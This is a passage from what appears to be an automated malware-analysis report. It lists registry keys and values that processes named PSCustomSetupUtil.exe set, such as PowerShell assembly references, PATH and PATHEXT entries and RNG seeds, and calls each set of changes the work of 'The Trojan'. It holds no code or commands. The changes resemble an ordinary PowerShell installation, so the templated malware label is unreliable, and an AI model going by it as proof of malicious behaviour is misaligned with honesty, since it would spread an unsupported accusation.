"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"EventMessageFile" = "%System%\WindowsPowerShell\v1.0\pwrshmsg.dll"
[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\TypeLib]
"Version" = "1.0"
The following service will be launched automatically at system boot-up:
[HKLM\System\CurrentControlSet\Services\SENS]
"Start" = "2"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\df4:111008\iis]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\df4:111008]
The process PSCustomSetupUtil.exe:2428 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A9 17 DD 0F 46 C9 37 91 3D AA FE E4 AE 54 6A 67"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Editor,1.0.0.0,,31bf3856ad364e35,MSIL" = "18 68 49 9C CA AB D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Editor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "205"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "206"
"StoreChangeIDFor64BitProcesses" = "184"
"StoreChangeIDFor32BitProcesses" = "205"
The process PSCustomSetupUtil.exe:3452 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0B EB 10 6E C7 87 49 6D CB 4E 94 77 C1 6A 3B 9C"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "B8 D9 AA 97 CA AB D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "194"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "195"
"StoreChangeIDFor64BitProcesses" = "173"
"StoreChangeIDFor32BitProcesses" = "194"
The process PSCustomSetupUtil.exe:3416 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C6 1A 45 C7 0A FD 17 F8 8F B8 C5 81 37 2D A0 2A"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Runtime, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "193"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Runtime,1.0.0.0,,31bf3856ad364e35,MSIL" = "B0 2A 7B 97 CA AB D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "194"
"StoreChangeIDFor64BitProcesses" = "172"
"StoreChangeIDFor32BitProcesses" = "193"
The process PSCustomSetupUtil.exe:2800 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C8 E3 AA 93 0D B0 CD B0 CF D4 9B 8F 42 22 EE C4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "196"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "197"
"System.Management.Automation.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "C8 37 0A 98 CA AB D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\References\System.Management.Automation.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "175"
"StoreChangeIDFor32BitProcesses" = "196"
The process PSCustomSetupUtil.exe:3068 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "00 44 7F F9 85 6B 73 9B B4 5E DD 04 9C C7 F9 1F"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "188"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35,MSIL" = "20 36 83 96 CA AB D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "189"
"StoreChangeIDFor64BitProcesses" = "167"
"StoreChangeIDFor32BitProcesses" = "188"
The process PSCustomSetupUtil.exe:3232 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "40 E5 A3 00 CD FA D7 64 FB 30 99 77 53 8F E0 47"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Security,1.0.0.0,,31bf3856ad364e35,MSIL" = "54 91 20 97 CA AB D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "191"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "192"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Security, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "170"
"StoreChangeIDFor32BitProcesses" = "191"
The process PSCustomSetupUtil.exe:2300 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "62 8A 24 2F A4 4B 84 94 4A 64 FC 18 46 CE FC 94"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process PSCustomSetupUtil.exe:2484 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3A 64 93 21 A2 88 CE E0 39 C7 E8 20 2F AE 7A 4E"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GPowerShell, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "206"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GPowerShell,1.0.0.0,,31bf3856ad364e35,MSIL" = "B8 8D 6F 9C CA AB D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "207"
"StoreChangeIDFor64BitProcesses" = "185"
"StoreChangeIDFor32BitProcesses" = "206"
The process PSCustomSetupUtil.exe:2548 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "82 70 61 BC EA 4C C2 B4 54 CC AD E3 BE 21 43 29"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GraphicalHost.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "207"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GraphicalHost.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "A4 EE 90 9C CA AB D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "208"
"StoreChangeIDFor64BitProcesses" = "186"
"StoreChangeIDFor32BitProcesses" = "207"
The process PSCustomSetupUtil.exe:3344 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "55 1C 03 59 21 54 3E 7D AD B8 8E 31 DF 3C EF 7B"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35,MSIL" = "02 DE 4D 97 CA AB D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Diagnostics, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "192"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "193"
"StoreChangeIDFor64BitProcesses" = "171"
"StoreChangeIDFor32BitProcesses" = "192"
The process PSCustomSetupUtil.exe:2388 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2B 3C E8 65 1E 7D 25 5C FD A3 B7 FA C9 D8 E6 B3"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GraphicalHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GraphicalHost,1.0.0.0,,31bf3856ad364e35,MSIL" = "1E E0 20 9C CA AB D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "204"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "205"
"StoreChangeIDFor64BitProcesses" = "183"
"StoreChangeIDFor32BitProcesses" = "204"
The process PSCustomSetupUtil.exe:2288 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4B 89 DD 38 F5 EE FB A5 9B 9D D9 F7 F3 36 CE 7C"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"PATHEXT" = ".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.PSC1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process PSCustomSetupUtil.exe:3664 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "35 92 7C ED B8 AA D0 3E 5A 3C BF C8 8B 50 D0 36"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.ConsoleHost.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.ConsoleHost.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "76 84 37 98 CA AB D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "197"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "198"
"StoreChangeIDFor64BitProcesses" = "176"
"StoreChangeIDFor32BitProcesses" = "197"
The process PSCustomSetupUtil.exe:2600 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "57 F9 A1 08 D2 40 1A E2 2D 60 2F DF 3C BB A0 B8"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Editor.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "208"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "209"
"Microsoft.PowerShell.Editor.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "EA B1 B4 9C CA AB D1 01"
"StoreChangeIDFor64BitProcesses" = "187"
"StoreChangeIDFor32BitProcesses" = "208"
The process PSCustomSetupUtil.exe:2876 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "19 54 83 DB FF D0 FA 75 A4 E5 35 3F C6 FF A9 A8"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GPowerShell.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "22 4E D1 9C CA AB D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GPowerShell.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "210"
"StoreChangeIDFor64BitProcesses" = "188"
"StoreChangeIDFor32BitProcesses" = "209"
The process PSCustomSetupUtil.exe:3884 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "62 41 10 97 6E 7B 2D 09 31 A4 E6 C3 AE E8 A0 C2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Diagnostics.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "7A F2 E7 98 CA AB D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "201"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "202"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Diagnostics.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "180"
"StoreChangeIDFor32BitProcesses" = "201"
The process PSCustomSetupUtil.exe:2284 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EA 87 65 57 5A 97 0C 29 AE 7F 64 96 59 83 7F B8"
[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"Path" = "C:\Perl\site\bin;C:\Perl\bin;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;c:\Program Files\Wireshark;%System%\WindowsPowerShell\v1.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process PSCustomSetupUtil.exe:3932 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AA D9 9A 70 5A 35 6B 22 05 AF CB 13 FC D1 63 49"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "74 7A 10 99 CA AB D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "202"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "203"
"StoreChangeIDFor64BitProcesses" = "181"
"StoreChangeIDFor32BitProcesses" = "202"
The process PSCustomSetupUtil.exe:2976 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 47 D0 E5 05 1D EE E7 50 DF C6 8D D1 A5 6B 0C"
[HKLM\SOFTWARE\Microsoft\Fusion\References\System.Management.Automation, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"System.Management.Automation,1.0.0.0,,31bf3856ad364e35,MSIL" = "CC 4B 58 96 CA AB D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "187"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "188"
"StoreChangeIDFor64BitProcesses" = "166"
"StoreChangeIDFor32BitProcesses" = "187"
The process PSCustomSetupUtil.exe:3704 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FD 20 75 8F 8B 32 51 94 35 6A 57 87 78 B3 51 DE"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "70 0C 60 98 CA AB D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "198"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "199"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "177"
"StoreChangeIDFor32BitProcesses" = "198"
The process PSCustomSetupUtil.exe:3544 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EE EC 97 D2 D9 56 79 FC D6 71 F3 32 22 E1 CF 1C"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.BackgroundIntelligentTransfer.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "C0 88 DA 97 CA AB D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.BackgroundIntelligentTransfer.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "195"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "196"
"StoreChangeIDFor64BitProcesses" = "174"
"StoreChangeIDFor32BitProcesses" = "195"
The process PSCustomSetupUtil.exe:3140 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "75 CA AD A8 FB F2 18 C6 13 5C F5 B3 4D DC AA 0B"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "9E 95 C3 96 CA AB D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "189"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "190"
"StoreChangeIDFor64BitProcesses" = "168"
"StoreChangeIDFor32BitProcesses" = "189"
The process PSCustomSetupUtil.exe:3784 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
